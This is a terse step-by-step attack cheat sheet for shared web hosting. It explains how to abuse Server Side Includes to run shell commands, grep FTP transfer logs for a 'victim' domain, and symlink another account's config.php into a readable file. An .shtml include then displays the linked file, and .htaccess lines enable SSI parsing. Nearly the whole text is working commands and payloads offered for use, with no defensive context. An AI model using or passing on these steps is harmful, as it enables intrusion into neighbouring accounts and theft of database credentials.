I. Server Side Includes
II. Find Victim:
cd /var/log/proftpd
more xferlog.*|grep victim.com
cat xferlog.*|grep victim.com
or go to step IV
<!--#exec cmd="more xferlog.*|grep victim.com" -->

III. Symlink:

ln -s /home/...../public_html/config.php config.txt
or go to step IV
<!--#exec cmd="ln -s /home/...../public_html/config.php config.txt" -->
IV. View - Use Server Side Includes:
Create cmd.shtml with content:
<!--#include virtual="config.txt" -->

V. Note:

Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml